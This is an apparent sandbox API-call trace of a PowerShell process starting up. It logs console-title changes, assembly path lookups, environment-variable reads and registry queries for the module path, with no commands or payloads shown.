	[0509.711] GetConsoleTitleW (in: lpConsoleTitle=0x1b7b15b0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0510.482] CoTaskMemFree (pv=0x1b7b15b0) 
	[0510.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0510.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0510.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0510.484] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0512.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.984] SetConsoleCtrlHandler (HandlerRoutine=0x26d68dc, Add=1) returned 1
	[0514.208] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x314
	[0514.210] CoCreateGuid (in: pguid=0x1cdcd0 | out: pguid=0x1cdcd0*(Data1=0x6850d6df, Data2=0x2a62, Data3=0x4df5, Data4=([0]=0x95, [1]=0x74, [2]=0x2a, [3]=0x19, [4]=0x92, [5]=0x19, [6]=0xc3, [7]=0xaf))) returned 0x0
	[0514.212] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0514.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.212] CoTaskMemFree (pv=0x3e2f10) 
	[0514.235] WinSqmIsOptedIn () returned 0x0
	[0514.235] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0514.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.235] CoTaskMemFree (pv=0x3e2f10) 
	[0514.236] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0514.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.236] CoTaskMemFree (pv=0x3e2f10) 
	[0514.236] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0514.237] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.237] CoTaskMemFree (pv=0x3e2f10) 
	[0514.237] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0514.237] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.237] CoTaskMemFree (pv=0x3e2f10) 
	[0514.238] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0514.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.238] CoTaskMemFree (pv=0x3e2f10) 
	[0514.239] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0514.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.239] CoTaskMemFree (pv=0x3e2f10) 
	[0514.239] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0514.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.239] CoTaskMemFree (pv=0x3e2f10) 
	[0514.240] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0514.240] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.240] CoTaskMemFree (pv=0x3e2f10) 
	[0515.575] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0515.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.575] CoTaskMemFree (pv=0x3e2f10) 
	[0515.589] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0515.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.590] CoTaskMemFree (pv=0x3e2f10) 
	[0515.591] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0515.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.591] CoTaskMemFree (pv=0x3e2f10) 
	[0515.591] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0515.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0515.591] CoTaskMemFree (pv=0x3e2f10) 
	[0521.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.731] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0523.731] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0523.731] CoTaskMemFree (pv=0x3e2f10) 
	[0523.732] CoTaskMemAlloc (cb=0xcc) returned 0x1b7af350
	[0523.732] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7af350, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0523.732] CoTaskMemFree (pv=0x1b7af350) 
	[0523.732] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd848 | out: phkResult=0x1cd848*=0x2d8) returned 0x0
	[0523.733] RegQueryValueExW (in: hKey=0x2d8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd7cc, lpData=0x0, lpcbData=0x1cd7c8*=0x0 | out: lpType=0x1cd7cc*=0x2, lpData=0x0, lpcbData=0x1cd7c8*=0x6c) returned 0x0
	[0523.733] CoTaskMemAlloc (cb=0x70) returned 0x3823a0
	[0523.733] RegQueryValueExW (in: hKey=0x2d8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd79c, lpData=0x3823a0, lpcbData=0x1cd798*=0x6c | out: lpType=0x1cd79c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1cd798*=0x6c) returned 0x0
	[0523.733] CoTaskMemFree (pv=0x3823a0) 
	[0523.733] CoTaskMemAlloc (cb=0xcc) returned 0x1b7af350
	[0523.733] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b7af350, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0523.733] CoTaskMemFree (pv=0x1b7af350) 
	[0523.733] CoTaskMemAlloc (cb=0xcc) returned 0x1b7af350
	[0523.733] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7af350, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0523.733] CoTaskMemFree (pv=0x1b7af350) 
	[0523.737] RegCloseKey (hKey=0x2d8) returned 0x0
	[0523.737] CoTaskMemAlloc (cb=0xcc) returned 0x1b7af350
	[0523.737] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7af350, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0523.737] CoTaskMemFree (pv=0x1b7af350) 
	[0523.737] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd848 | out: phkResult=0x1cd848*=0x2d8) returned 0x0
	[0523.737] RegQueryValueExW (in: hKey=0x2d8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd7cc, lpData=0x0, lpcbData=0x1cd7c8*=0x0 | out: lpType=0x1cd7cc*=0x0, lpData=0x0, lpcbData=0x1cd7c8*=0x0) returned 0x2
	[0523.738] RegCloseKey (hKey=0x2d8) returned 0x0
	[0524.739] CoTaskMemAlloc (cb=0x20c) returned 0x3dd440
	[0524.740] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3dd440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0524.741] CoTaskMemFree (pv=0x3dd440) 
	[0524.741] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0524.742] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0524.752] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0524.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0524.752] CoTaskMemFree (pv=0x3e2f10) 
	[0524.755] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0524.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0524.755] CoTaskMemFree (pv=0x3e2f10) 
	[0524.759] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0524.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0524.759] CoTaskMemFree (pv=0x3e2f10) 
	[0524.759] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0524.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0524.759] CoTaskMemFree (pv=0x3e2f10) 
	[0524.761] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd638 | out: phkResult=0x1cd638*=0x324) returned 0x0
	[0524.762] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x1cd64c, lpData=0x0, lpcbData=0x1cd648*=0x0 | out: lpType=0x1cd64c*=0x1, lpData=0x0, lpcbData=0x1cd648*=0x74) returned 0x0
	[0524.762] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x1cd5bc, lpData=0x0, lpcbData=0x1cd5b8*=0x0 | out: lpType=0x1cd5bc*=0x1, lpData=0x0, lpcbData=0x1cd5b8*=0x74) returned 0x0
	[0524.762] CoTaskMemAlloc (cb=0x78) returned 0x3823a0
	[0524.762] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x1cd58c, lpData=0x3823a0, lpcbData=0x1cd588*=0x74 | out: lpType=0x1cd58c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd588*=0x74) returned 0x0
	[0524.762] CoTaskMemFree (pv=0x3823a0) 
	[0524.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1cd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0524.762] SetErrorMode (uMode=0x1) returned 0x1
	[0524.763] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd510 | out: lpFileInformation=0x1cd510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0524.763] SetErrorMode (uMode=0x1) returned 0x1
	[0524.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0524.765] SetErrorMode (uMode=0x1) returned 0x1
